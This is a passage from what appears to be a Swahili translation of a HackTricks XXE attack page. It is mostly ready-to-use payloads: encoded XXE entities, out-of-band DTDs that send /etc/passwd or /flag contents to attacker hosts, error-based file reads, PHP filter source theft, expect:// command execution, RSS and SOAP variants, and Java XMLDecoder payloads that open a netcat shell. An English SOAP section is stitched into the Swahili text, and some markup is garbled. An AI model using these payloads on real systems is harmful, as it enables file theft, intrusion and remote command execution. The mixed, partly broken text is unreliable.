Unaweza kutumia \[**"Muhuri wa Kubadilisha" ya cyberchef hapa ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) kubadilisha UTF-7.
```xml
<!xml version="1.0" encoding="UTF-7"?-->
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
```

```xml
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
### Kosa la Itifaki ya Faili

Ikiwa wavuti inatumia PHP, badala ya kutumia `file:/` unaweza kutumia **php wrappers** `php://filter/convert.base64-encode/resource=` ili **kupata faili za ndani**.

Ikiwa wavuti inatumia Java unaweza kuangalia [**jar: itifaki**](xxe-xee-xml-external-entity.md#jar-protocol).

### Entiti za HTML

Hila kutoka [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
Unaweza kuunda **entiti ndani ya entiti** ikifanywa kuwa **entiti za HTML** na kisha kuita ili **kupakia dtd**.\
Kumbuka kuwa **Entiti za HTML** zinazotumiwa zinahitaji kuwa **za nambari** (kama \[katika mfano huu]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>
```
Mfano wa DTD:
```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
%abt;
%exfil;
```
## PHP Wrappers

### Base64

**Extract** _**index.php**_
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
```
#### **Chota rasilimali ya nje**
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]>
```
### Utekelezaji wa kodi kwa mbali

**Ikiwa moduli ya PHP "expect" imepakiwa**
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
```
## **SOAP - XEE**

### **Introduction**

XML External Entity (XXE) is a vulnerability that occurs when an application processes XML input from an untrusted source without disabling external entity references in the XML parser. This can lead to various attacks, including disclosure of internal files, denial of service, server-side request forgery (SSRF), and remote code execution.

In this section, we will focus on XXE attacks in SOAP (Simple Object Access Protocol) web services. SOAP is a protocol used for exchanging structured information in web services using XML.

### **XXE in SOAP**

XXE attacks in SOAP can occur when the web service processes XML input that contains external entity references. These references can be used to access files on the server or perform other malicious actions.

To exploit XXE in SOAP, an attacker can send a SOAP request containing a malicious XML payload that includes an external entity reference. When the server processes this request, it will attempt to resolve the entity reference, leading to potential information disclosure or other attacks.

### **Exploiting XXE in SOAP**

To exploit XXE in SOAP, an attacker needs to craft a SOAP request with a malicious XML payload. The payload should include an external entity reference that points to a file or resource the attacker wants to access.

The following is an example of a SOAP request with an XXE payload:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xxe="http://example.com/xxe">
   <soapenv:Header/>
   <soapenv:Body>
      <xxe:payload>
         <!DOCTYPE foo [
            <!ENTITY xxe SYSTEM "file:///etc/passwd">
         ]>
         <data>Some data</data>
      </xxe:payload>
   </soapenv:Body>
</soapenv:Envelope>
```

In this example, the external entity reference `<!ENTITY xxe SYSTEM "file:///etc/passwd">` is used to access the `/etc/passwd` file on the server. The contents of this file will be included in the response from the server, potentially leaking sensitive information.

### **Preventing XXE in SOAP**

To prevent XXE attacks in SOAP, it is important to disable external entity references in the XML parser used by the web service. This can be done by configuring the XML parser to disallow external entities or by using a secure XML parsing library that automatically disables external entity resolution.

Additionally, input validation and sanitization should be performed on any XML input received by the web service. This includes filtering out or escaping any potentially malicious XML entities or references.

### **Conclusion**

XXE attacks in SOAP can be a serious security vulnerability that can lead to various types of attacks. By understanding how XXE works in the context of SOAP web services and implementing proper security measures, such as disabling external entity references and performing input validation, developers can protect their applications from this type of attack.
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
## XLIFF - XXE

Mfano huu umehamasishwa na [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)

XLIFF (XML Localization Interchange File Format) hutumiwa kawaida kubadilishana data katika mchakato wa ufasiri. Ni muundo unaotegemea XML unaotumiwa hasa kwa kuhamisha data inayoweza kufasiriwa kati ya zana wakati wa ufasiri na kama muundo wa kawaida wa kubadilishana kwa zana za CAT (Computer-Aided Translation).

### Uchambuzi wa Ombi Bubu

Ombi linatumwa kwa seva na yafuatayo yana maudhui:
```xml
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
Hata hivyo, ombi hili linasababisha kosa la seva ya ndani, likitaja hasa tatizo na matangazo ya alama:
```json
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
```
Licha ya kosa, kuna rekodi ya hiti kwenye Burp Collaborator, ikionyesha kiwango fulani cha mwingiliano na kifaa cha nje.

Kutoka kwa Band Data Exfiltration
Ili kuchukua data, ombi lililobadilishwa linatumwa:
```
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
Hii njia inaonyesha kuwa User Agent inaonyesha matumizi ya Java 1.8. Kikwazo kinachojulikana na toleo hili la Java ni kutokuweza kupata faili zinazohusisha herufi ya mstari mpya, kama vile /etc/passwd, kwa kutumia mbinu ya Out of Band.

Uchimbaji wa Data kwa Kutumia Makosa
Ili kushinda kikwazo hiki, njia ya Uchimbaji wa Data kwa Kutumia Makosa inatumika. Faili ya DTD imepangwa kama ifuatavyo ili kusababisha kosa ambalo linajumuisha data kutoka kwenye faili ya lengo:
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
%foo;
%xxe;
```
Seva inajibu na kosa, ikionyesha faili isiyokuwepo, ikionyesha kuwa seva inajaribu kupata faili iliyotajwa:
```javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
```
Kuongeza maudhui ya faili katika ujumbe wa kosa, faili ya DTD inabadilishwa:
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
%foo;
%xxe;
```
Mabadiliko haya yanapelekea kuvuja kwa mafaili, kama inavyoonekana katika matokeo ya kosa yaliyotumwa kupitia HTTP. Hii inaashiria shambulio la XXE (XML External Entity) lililofanikiwa, likitumia njia za Out of Band na Error-Based kuchukua taarifa nyeti.


## RSS - XEE

XML halali na muundo wa RSS kutumia udhaifu wa XXE.

### Ping back

Ombi rahisi la HTTP kwa seva ya mshambuliaji
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>XXE Test Blog</title>
<link>http://example.com/</link>
<description>XXE Test Blog</description>
<lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>Test Post</description>
<author>author@example.com</author>
<pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
### Soma faili

Unapojaribu kutekeleza mashambulizi ya XXE (XML External Entity), moja ya malengo yako yanaweza kuwa kusoma faili kutoka kwa mfumo wa lengo. Kwa kufanya hivyo, unaweza kutumia kipengele cha XML External Entity (XEE) ambacho kinaruhusu kusoma faili kutoka kwa mfumo wa lengo.

Kuna njia kadhaa za kufanikisha hili. Moja ya njia hizo ni kutumia kipengele cha `<!ENTITY>` katika hati ya XML. Kwa kufafanua kipengele hiki, unaweza kusoma faili kutoka kwa mfumo wa lengo.

Kwa mfano, ikiwa unataka kusoma faili ya `/etc/passwd` kutoka kwa mfumo wa lengo, unaweza kutumia hati ya XML ifuatayo:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root></root>
```

Katika hati hii ya XML, tunafafanua kipengele cha `xxe` ambacho kinasoma faili ya `/etc/passwd` kutoka kwa mfumo wa lengo. Kisha tunatumia kipengele hicho katika hati ya DTD (Document Type Definition) ili kusoma faili hiyo.

Kwa kutekeleza mashambulizi haya ya XXE, unaweza kusoma faili zilizohifadhiwa kwenye mfumo wa lengo na kupata habari muhimu kama majina ya watumiaji na nywila.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
### Soma msimbo wa chanzo

Kutumia PHP base64 filter
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
## Java XMLDecoder XEE to RCE

XMLDecoder ni darasa la Java ambalo linajenga vitu kulingana na ujumbe wa XML. Ikiwa mtumiaji mwenye nia mbaya anaweza kupata programu tumizi kutumia data ya kiholela katika wito wa njia **readObject**, atapata moja kwa moja utekelezaji wa nambari kwenye seva.

### Kutumia Runtime().exec()
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
</void>
</object>
</java>
```
### ProcessBuilder

ProcessBuilder ni darasa katika Java ambalo linatumika kujenga na kudhibiti mchakato wa nje. Inaweza kutumika katika ujenzi wa amri za mfumo na kuziendesha kutoka ndani ya programu ya Java.

Kwa kutumia ProcessBuilder, unaweza kuanzisha mchakato mpya na kumtaja amri ya mfumo ambayo unataka kutekelezwa. Unaweza pia kudhibiti mazingira ya mchakato, kama vile kuweka mazingira ya mfumo na kusimamia viwambo vya mchakato.

Kwa mfano, unaweza kutumia ProcessBuilder kuunda mchakato wa nje wa kutekeleza amri ya mfumo kama vile "ls" kwenye mfumo wa Linux. Hii inaweza kufanyika kwa njia ifuatayo:

```java
ProcessBuilder processBuilder = new ProcessBuilder("ls");
Process process = processBuilder.start();
```

Kisha, unaweza kusoma matokeo ya amri ya mfumo kutoka kwa mchakato uliozinduliwa kwa kutumia `InputStream`:

```java
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
    System.out.println(line);
}
```

Kwa njia hii, unaweza kutekeleza amri za mfumo kutoka ndani ya programu yako ya Java na kusoma matokeo yake. ProcessBuilder ni chombo muhimu katika uwanja wa ujenzi wa programu na inaweza kutumiwa kwa njia nyingi tofauti kulingana na mahitaji yako.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
<void method="start" id="process">
</void>
</void>
</java>
```
## Vifaa

{% embed url="https://github.com/luisfontes19/xxexploiter" %}

## Marejeo

* [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\
* [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\
* Chota habari kupitia HTTP kwa kutumia DTD ya nje: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\
* [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\
* [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\
* [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\
* [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>